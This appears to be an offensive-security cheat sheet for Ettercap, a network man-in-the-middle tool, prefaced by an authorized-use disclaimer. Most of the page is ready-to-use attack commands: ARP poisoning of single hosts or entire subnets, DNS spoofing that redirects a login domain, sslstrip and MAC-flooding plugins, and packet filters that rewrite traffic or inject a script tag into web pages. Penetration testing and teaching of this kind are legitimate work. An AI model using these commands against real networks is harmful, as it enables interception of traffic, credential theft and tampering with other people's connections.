← All cheat sheets

ETTERCAP

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

Network MITM attack tool for ARP poisoning, DNS spoofing,
credential sniffing, and traffic manipulation.

INSTALLATION#

sudo apt install ettercap-common ettercap-graphical  # Kali/Debian

INTERFACES#

ettercap -G                                 # GTK graphical
ettercap -T                                 # Text mode
ettercap -C                                 # Curses (ncurses)

BASIC ARP POISONING#

# MITM between target and gateway
sudo ettercap -T -M arp:remote /TARGET_IP// /GATEWAY_IP//
sudo ettercap -T -M arp:remote /10.10.10.5// /10.10.10.1//

# MITM entire subnet
sudo ettercap -T -M arp:remote /// ///

# Specific interface
sudo ettercap -T -i eth0 -M arp:remote /10.10.10.5// /10.10.10.1//

# Quiet mode (only show captured data)
sudo ettercap -T -q -M arp:remote /10.10.10.5// /10.10.10.1//

# With output file
sudo ettercap -T -q -M arp:remote /10.10.10.5// /10.10.10.1// -w capture.pcap

TARGET SYNTAX#

# /IP/PORT/
# Empty = all
/10.10.10.5//                               # Single host, all ports
/10.10.10.5/80/                             # Single host, port 80
/10.10.10.5-10//                            # IP range
/10.10.10.5,10.10.10.6//                    # Multiple IPs
///                                         # Everything

DNS SPOOFING#

# Edit /etc/ettercap/etter.dns
# Add entries:
example.com      A   10.10.10.100
*.example.com    A   10.10.10.100
login.target.com A   10.10.10.100

# Run with DNS spoof plugin
sudo ettercap -T -q -M arp:remote -P dns_spoof /10.10.10.5// /10.10.10.1//

PLUGINS#

# List available plugins
ettercap -T --list-plugins

# Common plugins
dns_spoof                                   # DNS spoofing
remote_browser                              # Send URLs to browser
repoison_arp                                # Re-poison ARP cache
sslstrip                                    # SSL stripping
search_promisc                              # Detect promisc mode
find_ettercap                               # Detect other ettercap
gw_discover                                 # Find gateways
rand_flood                                  # Flood with random MACs
find_conn                                   # Find active connections
arp_cop                                     # ARP storm detection

# Use plugin
sudo ettercap -T -M arp:remote -P plugin_name /TARGET// /GW//

FILTERS#

# Compile filter
etterfilter filter.ef -o filter.ef

# Example filter (drop packets):
if (ip.proto == TCP && tcp.dst == 80) {
    drop();
    msg("HTTP packet dropped\n");
}

# Example filter (replace content):
if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "Accept-Encoding")) {
        replace("Accept-Encoding", "Accept-Rubbish!");
    }
}

# Example filter (inject):
if (ip.proto == TCP && tcp.src == 80) {
    if (search(DATA.data, "</head>")) {
        replace("</head>", "<script>alert('xss')</script></head>");
    }
}

# Apply filter
sudo ettercap -T -q -M arp:remote -F filter.ef /10.10.10.5// /10.10.10.1//

COMMON COMMANDS (TEXT MODE)#

h                                           # Help
l                                           # Host list
s                                           # Start sniffing
p                                           # List plugins
q                                           # Quit

TIPS#

  - Bettercap is the modern successor to Ettercap
  - ARP poisoning only works on local network segments
  - Use -w to save pcap for offline analysis
  - DNS spoofing requires editing etter.dns before starting
  - Filters enable real-time packet modification
  - HSTS defeats SSL stripping on modern browsers
  - Use quiet mode (-q) to reduce noise
  - Multiple targets supported with comma separation
  - Check /etc/ettercap/etter.conf for configuration
  - Disable kernel IP forwarding check in etter.conf